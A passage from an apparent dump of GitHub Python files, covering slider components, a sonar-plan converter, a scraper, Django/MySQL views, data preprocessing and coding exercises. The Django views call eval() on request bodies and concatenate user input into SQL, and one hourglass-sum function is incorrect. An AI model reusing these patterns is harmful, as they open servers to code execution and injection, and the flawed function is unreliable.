(float, optional):\n The initial value of the slider. Defaults to 0.\n min (float, optional):\n The minimum value of the slider. Defaults to 0.\n max (float, optional):\n The maximum value of the slider. Defaults to 100.\n step_size (float, optional):\n The increment/decrement step size of the slider. Defaults to 1.0.\n\n Example:\n --------\n ```python\n class MySlider(pydase.components.NumberSlider):\n def __init__(\n self,\n value: float = 0.0,\n min_: float = 0.0,\n max_: float = 100.0,\n step_size: float = 1.0,\n ) -> None:\n super().__init__(value, min_, max_, step_size)\n\n @property\n def min(self) -> float:\n return self._min\n\n @min.setter\n def min(self, value: float) -> None:\n self._min = value\n\n @property\n def max(self) -> float:\n return self._max\n\n @max.setter\n def max(self, value: float) -> None:\n self._max = value\n\n @property\n def step_size(self) -> float:\n return self._step_size\n\n @step_size.setter\n def step_size(self, value: float) -> None:\n self._step_size = value\n\n @property\n def value(self) -> float:\n return self._value\n\n @value.setter\n def value(self, value: float) -> None:\n if value < self._min or value > self._max:\n raise ValueError(\n \"Value is either below allowed min or above max value.\"\n )\n\n self._value = value\n\n class MyService(pydase.DataService):\n def __init__(self) -> None:\n self.voltage = MyService()\n\n # Modifying or accessing the voltage value:\n my_service = MyService()\n my_service.voltage.value = 5\n print(my_service.voltage.value) # Output: 5\n ```\n \"\"\"\n\n def __init__(\n self,\n value: Any = 0.0,\n min_: float = 0.0,\n max_: float = 100.0,\n step_size: float = 1.0,\n ) -> None:\n super().__init__()\n self._step_size = step_size\n self._value = value\n self._min = min_\n self._max = max_\n\n @property\n def min(self) -> float:\n \"\"\"The min property.\"\"\"\n return self._min\n\n @property\n def max(self) -> float:\n \"\"\"The min property.\"\"\"\n return self._max\n\n @property\n def step_size(self) -> float:\n \"\"\"The min property.\"\"\"\n return self._step_size\n\n @property\n def value(self) -> Any:\n \"\"\"The value property.\"\"\"\n return self._value\n\n @value.setter\n def value(self, value: Any) -> None:\n self._value = value\n","repo_name":"tiqi-group/pydase","sub_path":"src/pydase/components/number_slider.py","file_name":"number_slider.py","file_ext":"py","file_size_in_byte":3080,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73818445352","text":"import geopy\nfrom geopy.distance import geodesic\nfrom pandas import DataFrame\n\nfrom src.converters.utility import convert_dist\nfrom src.interfaces.converter_interface import IConverter\nfrom src.utility import get_exception\n\nfrom src.log import get_logger\nimport re\n\n\nclass SonarPlanConverter(IConverter):\n logger = get_logger(__name__)\n\n def __init__(self):\n super().__init__()\n\n def convert(self, df: DataFrame, **kwargs) -> DataFrame:\n try:\n if kwargs['name'] == 'SONAR_PLAN_44':\n return convert_sonar_plan_44(df, kwargs['scientific_cols'])\n else:\n return df\n except Exception as e:\n self.logger.error(get_exception(e) + ' ' + kwargs['name'])\n return df\n\n\ndip_schemes = {\n '2': [\n (0, 1),\n (90, 1.5),\n (162, 2),\n (216, 2.5),\n (259, 3),\n (295, 3.5),\n (326, 4),\n (353, 4.5)\n ],\n '3': [\n (0, 1),\n (60, 2),\n (109, 3),\n (143, 4),\n (169, 5),\n (190, 6),\n (208, 7),\n (223, 8)\n ],\n '4': [\n (0, 1),\n (45, 2),\n (90, 3),\n (124, 4),\n (150, 5),\n (171, 6),\n (189, 7),\n (204, 8)\n ],\n}\n\ndip_degrees_schemes = {\n '2': (0, 180),\n '3': (0, 120, 240),\n '4': (0, 90, 180, 270)\n}\n\n\ndef convert_sonar_plan_44(df: DataFrame, scientific_cols):\n df_to_convert: DataFrame = df.copy()\n\n helis = get_dip_cols(scientific_cols)\n heli_count = str(len(helis))\n\n scheme = dip_schemes[heli_count]\n degrees_scheme = dip_degrees_schemes[heli_count]\n\n # For every row do:\n for i, row in df_to_convert.iterrows():\n ref_lat, ref_long = row['REF POINT LAT'], row['REF POINT LONG']\n\n current_dip = 1\n\n # For every heli do:\n for index, heli in enumerate(helis):\n dip_lat, dip_long = heli, re.sub(r'\\bX\\b', 'Y', heli)\n dip_degrees_scheme = degrees_scheme[index]\n\n # For every dip do:\n while dip_lat in list(df_to_convert.columns):\n dip_scheme = scheme[current_dip - 1]\n degrees, nm = dip_scheme[0], dip_scheme[1]\n degrees = (degrees + dip_degrees_scheme) % 360\n\n new_lat, new_long = move_geo_point(ref_lat, ref_long, degrees, nm)\n\n df_to_convert.at[i, dip_lat] = new_lat\n df_to_convert.at[i, dip_long] = new_long\n\n dip_lat = dip_lat.replace(str(current_dip), str(current_dip + 1))\n dip_long = dip_long.replace(str(current_dip), str(current_dip + 1))\n\n current_dip = current_dip + 1\n\n # go to next dip\n current_dip = 1\n\n return df_to_convert\n\n\ndef get_dip_cols(cols):\n regex_positive = re.compile('(1 *[A-Z ]* *X)')\n\n return list(filter(regex_positive.search, cols))\n\n\ndef get_dip_points(cols):\n regex_positive = re.compile(r'\\bX')\n\n return list(filter(regex_positive.search, cols))\n\n\ndef move_geo_point(lat1, lon2, b, nm):\n # given: lat1, lon1, b = bearing in degrees, nm = distance in nautical miles\n # calculates the next geo point in latitude and longitude\n\n km = convert_dist(nm, 'nm', 'km')\n origin = geopy.Point(lat1, lon2)\n destination = geodesic(kilometers=km).destination(origin, b)\n\n lat2, lon2 = destination.latitude, destination.longitude\n return lat2, lon2\n","repo_name":"jooppoelman/mer.io","sub_path":"src/converters/sonarplan_converter.py","file_name":"sonarplan_converter.py","file_ext":"py","file_size_in_byte":3412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2684890997","text":"__author__ = \"Nicola Ivanov\"\n__copyright__ = \"Copyright 2020, Johns Hopkins University\"\n__credits__ = [\"Nicola Ivanov\"]\n__license__ = \"Apache 2.0\"\n__version__ = \"0.1\"\n__maintainer__ = \"JHU-COVID-QA\"\n__email__ = \"covidqa@jhu.edu\"\n__status__ = \"Development\"\n\nimport datetime\nimport time\nimport requests\nfrom bs4 import BeautifulSoup, NavigableString, CData, Tag\nfrom covid_scraping import Conversion, Scraper\n\n\nclass DelawareGovScraper(Scraper):\n def scrape(self):\n name = 'Delaware State Government'\n url = 'https://coronavirus.delaware.gov/what-delawareans-can-do/#faqs'\n html = requests.get(url).text\n soup = BeautifulSoup(html, \"lxml\")\n\n questions = [str(q)\n for q in soup.findAll(\"h4\", {\"class\": \"panel-title\"})]\n answers = [str(a)\n for a in soup.findAll(\"div\", {\"class\": \"panel-body\"})]\n\n converter = Conversion(\n self._filename,\n self._path)\n for question, answer in zip(questions, answers):\n converter.addExample({\n 'sourceUrl': url,\n 'sourceName': name,\n \"needUpdate\": True,\n \"typeOfInfo\": \"QA\",\n \"isAnnotated\": False,\n \"responseAuthority\": \"\",\n \"question\": question,\n \"answer\": answer,\n \"hasAnswer\": True,\n \"targetEducationLevel\": \"NA\",\n \"topic\": [],\n \"extraData\": {},\n \"targetLocation\": \"Delaware\",\n \"language\": \"en\"\n })\n return converter.write()\n\n\ndef main():\n scraper = DelawareGovScraper(path='./', filename='Delaware')\n scraper.scrape()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"JHU-COVID-QA/scraping-qas","sub_path":"src/scraping/scrapers/delaware_gov.py","file_name":"delaware_gov.py","file_ext":"py","file_size_in_byte":1754,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"27634684035","text":"'''\nCreated on Aug 2, 2018\n\n@author: dlytle\n'''\nfrom PyQt5.QtCore import QAbstractTableModel, Qt, QModelIndex\nfrom PyQt5.QtGui import QColor\n\nclass DirectoryListModel(QAbstractTableModel):\n '''\n Given a current_directory this model backs up the other directory list.\n '''\n\n def __init__(self, current_directory):\n super(DirectoryListModel, self).__init__()\n self.current_directory = current_directory\n self.other_directories = current_directory.directories\n\n def data(self, index, role=Qt.DisplayRole):\n if (not index.isValid() or\n not (0 <= index.row() < len(self.other_directories))):\n return None\n a_directory = self.other_directories[index.row()]\n \n if role == Qt.DisplayRole:\n return a_directory.dir_name\n elif role == Qt.TextAlignmentRole:\n return int(Qt.AlignLeft|Qt.AlignVCenter)\n elif role == Qt.TextColorRole:\n return QColor(Qt.black)\n elif role == Qt.BackgroundColorRole:\n return QColor(230, 230, 230)\n return None\n \n def headerData(self, section, orientation, role=Qt.DisplayRole):\n if role == Qt.TextAlignmentRole:\n return int(Qt.AlignLeft|Qt.AlignVCenter)\n if role != Qt.DisplayRole:\n return None\n if orientation == Qt.Horizontal:\n return \"Directories\"\n return int(section)\n \n def rowCount(self, index=QModelIndex()):\n return len(self.other_directories)\n \n def columnCount(self, index=QModelIndex()):\n return 1\n","repo_name":"dyerlytle/FitsBrowse","sub_path":"FitsBrowse/src/DirectoryListModel.py","file_name":"DirectoryListModel.py","file_ext":"py","file_size_in_byte":1576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18254785850","text":"from fbprophet import Prophet\nfrom sklearn.metrics import r2_score, mean_absolute_error, mean_squared_error\n\n\ndef prophet(df_pr, y_col_name, date_col_name, pred_col_name, prediction_size=50):\n train_dataset = df_pr[:-prediction_size]\n test_dataset = df_pr[-prediction_size:]\n\n model = Prophet(weekly_seasonality=True, daily_seasonality=False)\n model.fit(train_dataset)\n future = model.make_future_dataframe(periods=prediction_size, freq='W')\n forecast = model.predict(future)\n\n r2 = r2_score(test_dataset[y_col_name], forecast[-prediction_size:]['yhat'])\n mae = mean_absolute_error(test_dataset[y_col_name], forecast[-prediction_size:]['yhat'])\n mse = mean_squared_error(test_dataset[y_col_name], forecast[-prediction_size:]['yhat'])\n return r2, mae, mse\n","repo_name":"Data-science-Folder/PricePrediction","sub_path":"modular_code/src/ML_Pipeline/prophet.py","file_name":"prophet.py","file_ext":"py","file_size_in_byte":785,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74738599592","text":"\"\"\"\nFunctions to perform string matching between labels and product names and\nlabel products accordingly.\n\"\"\"\nimport pandas as pd\nfrom nltk.metrics import distance\n\n\ndef label_prod_desc(labelled_items, item_id):\n \"\"\"Function to return the unique product descriptions for a given ons item\n\n Args:\n labelled_items (DataFrame): Pandas data frame containing\n the labelled dataset\n item_id (int): Integer number of the ons_item\n Return:\n array: product name of ons item of given item_id\n \"\"\"\n # find item of given id\n item = labelled_items[labelled_items[\"item_id\"] == item_id]\n return item[\"Web_product_desc\"].unique()\n\n\ndef calculate_ratio(df, prod_desc, metric, name_col=\"name\"):\n \"\"\"Function to calculate the string comparisons ratio combinations\n for all unique item descriptions and product names.\n\n Args:\n df (DataFrame): DataFrame containing data to be labelled\n prod_desc (list(str): unique product descriptions of labelled data\n metric (function): distance metric function to be used\n name_col (str): name of the column to match to\n\n Returns:\n (DataFrame, list):\n :data with calculated ratio for all unique label names\n :list of column names of ratio values created\n \"\"\"\n # loop through product descriptions\n for i, lab in enumerate(prod_desc):\n ratio = []\n # calculate ratio each combination\n for name in df.loc[:, name_col]:\n\n if metric == distance.jaccard_distance:\n ratio.append(metric(set(lab.lower()), set(name.lower())))\n else:\n ratio.append(metric(lab.lower(), name.lower()))\n\n # append ration to DataFrame\n df.loc[:, \"ratio_\" + str(i)] = ratio\n\n # column names containing the ratio values\n cols = df.keys()[(-1 * len(prod_desc)) :].tolist()\n return df, cols\n\n\ndef find_label_fuzzy(\n item_id,\n prod_desc,\n df,\n out_col=\"item_id\",\n threshold=70,\n greater=True,\n less=False,\n neg_thresh=30,\n):\n \"\"\"\n Function to apply the accepted threshold to the ratio and append labels.\n This function must be run after calculate_ratio.\n\n Args:\n item_id (int): integer id value of label to be assigned\n prod_desc (list(str)): unique product descriptions of labelled data\n df (DataFrame): DataFrame with data to be labelled, with ratios\n pre calculated using calculate_ratio\n out_col (str): the name of the output column containing the matches\n threshold (float): threshold value for accepting matches\n greater (bool): True if string matching metric requires greater than\n value is a better match, false otherwise\n e.g. FuzzyWuzzy matching\n less (bool): True if string matching metric requires lees than a value\n is a better match, false otherwise\n e.g. edit distance or Jaccard distance\n neg_thresh (float): the threshold for 'accepting' a match as not the item\n a negative match\n Return:\n (DataFrame, DataFrame):\n :DataFrame containing only the matched items\n :original DataFrame with labels appended\n \"\"\"\n # Empty DataFrame to hold matches\n matched = pd.DataFrame()\n neg_match = pd.DataFrame()\n\n # For each unique labeled distribution find if any matches have been found\n for i in range(len(prod_desc)):\n # if metric requires greater than threshold as better - fuzzy matching\n if greater:\n matched = matched.append(\n df.loc[df[\"ratio_\" + str(i)] > threshold], ignore_index=False\n )\n\n neg_match = neg_match.append(\n df.loc[df[\"ratio_\" + str(i)] < neg_thresh], ignore_index=False\n )\n\n # if metric requires less than threshold as better - edit or Jaccard\n if less:\n\n matched = matched.append(\n df.loc[df[\"ratio_\" + str(i)] < threshold], ignore_index=False\n )\n neg_match = neg_match.append(\n df.loc[df[\"ratio_\" + str(i)] > neg_thresh], ignore_index=False\n )\n\n # drop any duplicated rows from DataFrame (i.e. matched to several labels)\n matched = matched.drop_duplicates()\n neg_match = neg_match.drop_duplicates()\n\n # find matched items in DataFrame and label with itemid\n df.loc[matched.index, out_col] = int(item_id)\n\n # find the negative items\n neg_index = set(neg_match.index).difference(set(matched.index))\n df.loc[neg_index, out_col] = 0\n df.loc[df[out_col].isnull(), out_col] = -1\n\n return matched, df\n","repo_name":"ONSBigData/labelpropagation_clothing","sub_path":"src/Label_matching.py","file_name":"Label_matching.py","file_ext":"py","file_size_in_byte":4729,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"21893088673","text":"import cProfile, pstats, io\n\ndef profile(fnx):\n def wrapper(*args, **kwargs):\n pr = cProfile.Profile()\n pr.enable()\n ret = fnx(*args, **kwargs)\n pr.disable()\n s = io.StringIO()\n sortby = 'cumulative'\n ps = pstats.Stats(pr, stream=s).sort_stats(sortby)\n ps.print_stats()\n print(s.getvalue())\n return ret\n\n return wrapper\n ","repo_name":"k3agan/high_performance_python","sub_path":"Profiling/profile.py","file_name":"profile.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36512162766","text":"import cv2\nimport os\nimport pickle\nimport numpy as np\n\n\nclass CovidImage:\n\n def __init__(self, path, train_file, test_file, classes=['normal', 'pneumonia', 'COVID-19'], img_size=224):\n self.path = path\n self.train_file = train_file\n self.test_file = test_file\n self.img_size = img_size\n\n self.train_images = self._process_csv_file(train_file)\n self.train_dir = os.path.join(path, \"train\")\n self.train_N = len(self.train_images)\n self.trainX = []\n self.train_y = []\n\n self.test_images = self._process_csv_file(test_file)\n self.test_dir = os.path.join(path, \"test\")\n self.test_N = len(self.test_images)\n self.testX = []\n self.test_y = []\n\n self.classes = classes\n self.class_id = {c: classes.index(c) for c in classes}\n for c in classes:\n self.class_id[c+\"\\n\"] = classes.index(c)\n\n def load_data(self):\n\n try:\n self._load_pickled_train_data()\n print('Loading training data')\n\n except:\n print('Could not find pickled traning data')\n self._process_train_set()\n\n try:\n self._load_pickled_test_data()\n print('Loading test data')\n except:\n print('Could not find pickled test data')\n self._process_test_set()\n\n print(\"Loading done\")\n\n return self.trainX, self.train_y, self.testX, self.test_y\n\n def _process_csv_file(self, file):\n with open(file, 'r') as fr:\n files = fr.readlines()\n return files\n\n def _process_train_set(self):\n print(\"Processing train set\")\n image_data = []\n c = 0\n\n for datapoint in self.train_images:\n sample = datapoint.split(\" \")\n img = sample[1]\n label = sample[2]\n c = c + 1\n if c % 1000 == 0:\n print(\"Processed {} images of {}\".format(c, self.train_N))\n img_path = os.path.join(self.train_dir, img)\n # try: # if any image is corrupted\n image_data_temp = cv2.imread(img_path, cv2.IMREAD_GRAYSCALE) # Read Image as numbers\n image_temp_resize = cv2.resize(image_data_temp, (self.img_size, self.img_size))\n image_data.append([image_temp_resize, self.class_id[label]])\n # except:\n # pass\n\n data = np.asanyarray(image_data)\n X = []\n y = []\n # Iterate over the Data\n for x in data:\n X.append(x[0])\n y.append(x[1])\n\n self.trainX = np.asarray(X)/(255.0)\n self.train_y = np.asarray(y)\n\n self._pickle_train_data()\n print(\"Done with train data\")\n\n def _process_test_set(self):\n print(\"Processing test set\")\n image_data = []\n c = 0\n\n for datapoint in self.test_images:\n sample = datapoint.split(\" \")\n img = sample[1]\n label = sample[2]\n c = c + 1\n if c % 1000 == 0:\n print(\"Processed {} images of {}\".format(c, self.test_N))\n\n img_path = os.path.join(self.test_dir, img)\n # try:\n image_data_temp = cv2.imread(img_path, cv2.IMREAD_GRAYSCALE) # Read Image as numbers\n image_temp_resize = cv2.resize(image_data_temp, (self.img_size, self.img_size))\n image_data.append([image_temp_resize, self.class_id[label]])\n # except:\n # pass\n\n data = np.asanyarray(image_data)\n\n X = []\n y = []\n for x in data:\n X.append(x[0])\n y.append(x[1])\n\n self.testX = np.asarray(X)/(255.0)\n self.test_y = np.asarray(y)\n\n self._pickle_test_data()\n print(\"Done with test data\")\n\n def _pickle_train_data(self):\n N = self.trainX.shape[0]\n N2 = int(N/2)\n with open(os.path.join(self.path, \"trainX1.pickle\"), \"wb\") as f:\n pickle.dump(self.trainX[0:N2, :, :], f)\n\n with open(os.path.join(self.path, \"trainX2.pickle\"), \"wb\") as f:\n pickle.dump(self.trainX[N2:N, :, :], f)\n\n with open(os.path.join(self.path, \"train_y.pickle\"), \"wb\") as f:\n pickle.dump(self.train_y, f)\n\n def _pickle_test_data(self):\n with open(os.path.join(self.path, \"testX.pickle\"), \"wb\") as f:\n pickle.dump(self.testX, f)\n\n with open(os.path.join(self.path, \"test_y.pickle\"), \"wb\") as f:\n pickle.dump(self.test_y, f)\n\n def _load_pickled_train_data(self):\n with open(os.path.join(self.path, \"trainX1.pickle\"), \"rb\") as f:\n X1 = pickle.load(f)\n\n with open(os.path.join(self.path, \"trainX2.pickle\"), \"rb\") as f:\n X2 = pickle.load(f)\n\n self.trainX = np.concatenate((X1, X2))\n\n with open(os.path.join(self.path, \"train_y.pickle\"), \"rb\") as f:\n self.train_y = pickle.load(f)\n\n def _load_pickled_test_data(self):\n with open(os.path.join(self.path, \"testX.pickle\"), \"rb\") as f:\n self.testX = pickle.load(f)\n\n with open(os.path.join(self.path, \"test_y.pickle\"), \"rb\") as f:\n self.test_y = pickle.load(f)\n\n\ndef main():\n\n path = \"path/to/file/with/data\" # this should be teh folder where you have subfolders train and test and there are the train and test omages\n train_file = \"path/to/folder/train_COVIDx2.txt\" \n test_file = \"path/to/folder/test_COVIDx2.txt\" \n\n dataloader = CovidImage(path, train_file, test_file)\n trainX, train_y, testX, test_y = dataloader.load_data()\n\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"mimilazarova/DD2424-covid-xray-project","sub_path":"preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":5596,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"41734566515","text":"\"\"\"Descrição\nFazer um programa para ler uma string e calcular o número de palavras que ele contém. Exemplo: casa amarela, o número de palavras é 2. \n\nFormato de entrada\n\nUma string com no mínimo 1 caracter e no máximo 500.\n\nFormato de saída\n\nUm inteiro indicando a quantidade de palavras na string, seguido de um fim de linha.\"\"\"\n\ninserir_palvras = input()\n\ncontar_palavras = len(inserir_palvras.split() )\n\nprint (contar_palavras)","repo_name":"Andreza-S/Codando","sub_path":"códigos python/Contar palavras.py","file_name":"Contar palavras.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8085560778","text":"from rest_framework.decorators import api_view\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.http import JsonResponse\nimport mysql.connector\nimport json\nimport csv\nfrom root_config import main_root\nimport pandas as pd\n\nfrom main import Transform_join, Transform_sort\n\nmysql_connection = main_root()\n\n\ndef show_databases_tables(request):\n if request.method == 'GET':\n try:\n connection, databasename = mysql_connection.connection_databases()\n\n cursor = connection.cursor()\n\n cursor.execute(\"show databases\")\n databases_name = cursor.fetchall()\n all_databases = [databases[0] for databases in databases_name]\n\n cursor.execute(\"show tables\")\n tables_name = cursor.fetchall()\n all_tables = [tables[0] for tables in tables_name]\n\n cursor.execute(\"show columns from customers\")\n column_name = cursor.fetchall()\n\n customers_columns = [columns[0] for columns in column_name]\n\n cursor.execute(\"show columns from orders\")\n column_name = cursor.fetchall()\n\n orders_columns = [columns[0] for columns in column_name]\n\n print(customers_columns, orders_columns)\n connection.close()\n return JsonResponse({\n 'status': True,\n \"databases\": all_databases,\n \"tables\": {databasename: all_tables},\n \"customers_columns\": customers_columns,\n \"orders_columns\": orders_columns,\n \"msg\": \"Table created\"\n })\n\n except Exception as e:\n print(e)\n return JsonResponse({'status': False, \"msg\": \"Database not connected\"})\n\n\n@csrf_exempt\n@api_view(['POST'])\ndef connection_table(request):\n\n if request.method == 'POST':\n\n conn_data = eval(request.body)\n\n try:\n\n connection = mysql_connection.root_config(conn_data)\n try:\n cur = connection.cursor()\n cur.execute(\"create database \"+conn_data[\"database\"])\n connection.close()\n except:\n return JsonResponse({\"status\": False, \"msg\": \"Database already exist\"})\n\n connect_data, _ = mysql_connection.connection_databases()\n cur = connect_data.cursor()\n cur.execute(\n '''create table customers(\n CustomerID varchar(20),\n CompanyName varchar(50),\n ContactName varchar(50),\n ContactTitle varchar(50)\n )'''\n )\n\n cus_path = \"/opt/dataanalyzer/DataAnalyzer/customers.csv\"\n cus_list = []\n with open(cus_path) as cus_file:\n cus_csv = csv.DictReader(cus_file)\n for i in cus_csv:\n cus_list.append(i)\n cus_list = eval(json.dumps(cus_list))\n\n cus_query = '''INSERT INTO customers (\n CustomerID,\n CompanyName,\n ContactName,\n ContactTitle\n ) VALUES (%s,%s,%s,%s)'''\n\n for data in cus_list:\n val = (data[\"CustomerID\"], data[\"CompanyName\"],\n data[\"ContactName\"], data[\"ContactTitle\"])\n cur.execute(cus_query, val)\n connect_data.commit()\n\n cur.execute(\n '''create table orders(\n CustomerID varchar(255), \n EmployeeID varchar(255), \n Freight varchar(255), \n OrderDate varchar(255), \n OrderID varchar(255), \n RequiredDate varchar(255), \n ShipVia varchar(255), \n ShippedDate varchar(255)\n )'''\n )\n\n # cur.execute(\n # '''LOAD DATA INFILE '\"/home/vkscnb/Desktop/DataAnalyzer/customers.csv\"'\n # INTO TABLE customers\n # FIELDS TERMINATED BY ','\n # ENCLOSED BY '\"'\n # LINES TERMINATED BY '\\n'\n # IGNORE 1 ROWS\n # (CustomerID,CompanyName,ContactName,ContactTitle)\n # '''\n # )\n\n # cur.execute(\n # '''LOAD DATA INFILE 'cus_csv'\n # INTO TABLE orders\n # FIELDS TERMINATED BY ','\n # ENCLOSED BY '\"'\n # LINES TERMINATED BY '\\n'\n # IGNORE 1 ROWS\n # '''\n # )\n\n ord_path = \"/opt/dataanalyzer/DataAnalyzer/orders.csv\"\n ord_list = []\n with open(ord_path) as csv_file:\n ord_csv = csv.DictReader(csv_file)\n for i in ord_csv:\n ord_list.append(i)\n ord_list = eval(json.dumps(ord_list))\n\n ord_query = '''INSERT INTO orders (\n CustomerID,\n EmployeeID,\n Freight,\n OrderDate,\n OrderID,\n RequiredDate,\n ShipVia,\n ShippedDate\n ) VALUES (%s,%s,%s,%s,%s,%s,%s,%s)'''\n\n for data in ord_list:\n val1 = (data[\"CustomerID\"],\n data[\"EmployeeID\"],\n data[\"Freight\"],\n data[\"OrderDate\"],\n data[\"OrderID\"],\n data[\"RequiredDate\"],\n data[\"ShipVia\"],\n data[\"ShippedDate\"]\n )\n cur.execute(ord_query, val1)\n connect_data.commit()\n\n return JsonResponse({'status': True, \"msg\": \"DataBase is connected\"})\n except Exception as e:\n return JsonResponse({'status': False, \"msg\": \"DataBase is not connected\"})\n\n\n@csrf_exempt\ndef join_tables(request):\n if request.method == 'POST':\n\n joining_data = eval(request.body)\n\n try:\n\n connection, _ = mysql_connection.connection_databases()\n cursor = connection.cursor()\n\n cursor.execute(\"select * from customers\")\n row_headers = [x[0] for x in cursor.description]\n data = cursor.fetchall()\n json_data = []\n for result in data:\n json_data.append(dict(zip(row_headers, result)))\n table1 = eval(json.dumps(json_data))\n\n df_a = pd.DataFrame(table1)\n\n cursor.execute(\"select * from orders\")\n row_headers = [x[0] for x in cursor.description]\n data = cursor.fetchall()\n json_data = []\n for result in data:\n json_data.append(dict(zip(row_headers, result)))\n table2 = eval(json.dumps(json_data))\n\n df_b = pd.DataFrame(table2)\n\n df_c = Transform_join(\n df_a, df_b, joining_data['columnName'], 'inner')\n\n join_data = eval(json.dumps(df_c.to_dict(orient='records')))\n return JsonResponse({\"status\": True, \"msg\": \"table join\", \"join_data\": join_data})\n\n connection.close()\n\n except Exception as e:\n return JsonResponse({\"status\": False, \"msg\": \"table not join\"})\n\n\n@csrf_exempt\ndef transform_data(request):\n if request.method == \"POST\":\n try:\n\n transform_data = eval(request.body)\n\n df_b = pd.DataFrame(transform_data['data'])\n order = True if transform_data[\"orderby\"] == \"asce\" else False\n df_d = Transform_sort(df_b, transform_data[\"selectid\"], order)\n transform_data = eval(json.dumps(df_d.to_dict(orient='records')))\n\n return JsonResponse({\"status\": True, \"msg\": \"transform data\", \"transform_data\": transform_data})\n\n except Exception as e:\n return JsonResponse({\"status\": True, \"msg\": \"not transform data\"})\n\n# @csrf_exempt\n# def show_data(request):\n# if request.method == \"POST\":\n# try:\n\n# return JsonResponse({\"status\":True, \"msg\":\"show data\"})\n\n# except Exception as e:\n# return JsonResponse({\"status\":True, \"msg\":\"not data created\"})\n","repo_name":"vkscnb/DataAnalyzer","sub_path":"backend/app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31499630218","text":"from LinkedList_2 import *\n\"\"\"\nclass Cat:\n def __init__(self):\n pass\n\n\nclass Dog:\n def __init__(self):\n pass\n\"\"\"\n\n\nclass AnimalWrapper:\n def __init__(self, animal, time):\n self.time = time\n self.animal = animal\n\nclass ListHeadTail:\n def __init__(self):\n self.head = None\n self.tail = None\n\nclass ShelterQueue:\n def __init__(self):\n self.time = 0\n # dog, cat\n self.queue = [ListHeadTail(), ListHeadTail()]\n\n def enqueue(self, animal):\n if animal[0] == 'c':\n self.__enqueue(animal, 1, self.time)\n elif animal[0] == 'd':\n self.__enqueue(animal, 0, self.time)\n else:\n raise Exception(\"wrong animal\")\n self.time += 1\n\n def __enqueue(self, animal,cat_dog_index, time):\n wrapper = Node(AnimalWrapper(animal, time))\n\n if not self.queue[cat_dog_index].head:\n self.queue[cat_dog_index].head = wrapper\n self.queue[cat_dog_index].tail = wrapper\n else:\n self.queue[cat_dog_index].tail.next = wrapper\n self.queue[cat_dog_index].tail = wrapper\n\n def dequeueAny(self):\n if not (self.queue[0].head or self.queue[1].head):\n raise Exception(\"queue empty\")\n time = float('inf')\n isCat = False\n if self.queue[0].head and self.queue[0].head.data.time < time:\n time = self.queue[0].head.data.time\n isCat = False\n if self.queue[1].head and self.queue[1].head.data.time < time:\n time = self.queue[1].head.data.time\n isCat = True\n if isCat:\n return self.dequeueCat()\n else:\n return self.dequeueDog()\n\n def dequeueCat(self):\n return self.__dequeue(1)\n\n def dequeueDog(self):\n return self.__dequeue(0)\n\n def __dequeue(self, cat_dog_index):\n if not self.queue[cat_dog_index].head:\n raise Exception(\"can’t dequeue - empty\")\n animal = self.queue[cat_dog_index].head.data.animal\n self.queue[cat_dog_index].head = self.queue[cat_dog_index].head.next\n if not self.queue[cat_dog_index].head:\n self.queue[cat_dog_index].tail = None\n return animal\n\n\nif __name__ == \"__main__\":\n queue = ShelterQueue()\n vals = [\"c1\", \"d1\", \"d2\", \"c2\", \"c3\"]\n for v in vals:\n queue.enqueue(v)\n print(queue.dequeueCat())\n print(queue.dequeueDog())\n print(queue.dequeueAny())\n queue.enqueue(\"d3\")\n print(queue.dequeueDog())\n\n","repo_name":"Mitan/interview-book","sub_path":"ch_3/3_6.py","file_name":"3_6.py","file_ext":"py","file_size_in_byte":2579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36701032953","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n#\n# Complete the 'hourglassSum' function below.\n#\n# The function is expected to return an INTEGER.\n# The function accepts 2D_INTEGER_ARRAY arr as parameter.\n#\n\ndef hourglassSum(arr):\n max_sum = float('-inf') # Khởi tạo giá trị max_sum là giá trị âm vô cùng\n #Tính giá trị theo hình đồng hồ cát \n for i in range(len(arr) - 2): # Duyệt qua các hàng\n for j in range(len(arr) - 2): # Duyệt qua các cột\n current_sum = (\n arr[i][j] + arr[i][j + 1] + arr[i][j + 2] + # 3 phần tử bên trên\n arr[i + 1][j + 1] + # Phần tử ở giữa\n arr[i + 2][j] + arr[i + 2][j + 1] + arr[i + 2][j + 2] #3 phần từ ở dưới\n )\n max_sum = max(max_sum, current_sum) # Cập nhật giá trị max_sum\n\n return max_sum\n\ndef hourglass_sum(arr):\n n = len(arr)\n m = len(arr[0])\n sums = [[0] * m for _ in range(n)]\n\n # Tính tổng các giá trị từ góc trái trên đến vị trí hiện tại\n for i in range(n):\n for j in range(m):\n sums[i][j] = arr[i][j] + (\n sums[i-1][j] if i > 0 else 0) + (\n sums[i][j-1] if j > 0 else 0) - (\n sums[i-1][j-1] if i > 0 and j > 0 else 0)\n\n max_sum = float('-inf')\n\n # Duyệt qua từng vị trí và tính tổng hourglass\n for i in range(2, n):\n for j in range(2, m):\n hourglass_sum = sums[i][j] - sums[i-2][j] - sums[i][j-2] + sums[i-2][j-2]\n max_sum = max(max_sum, hourglass_sum)\n\n return 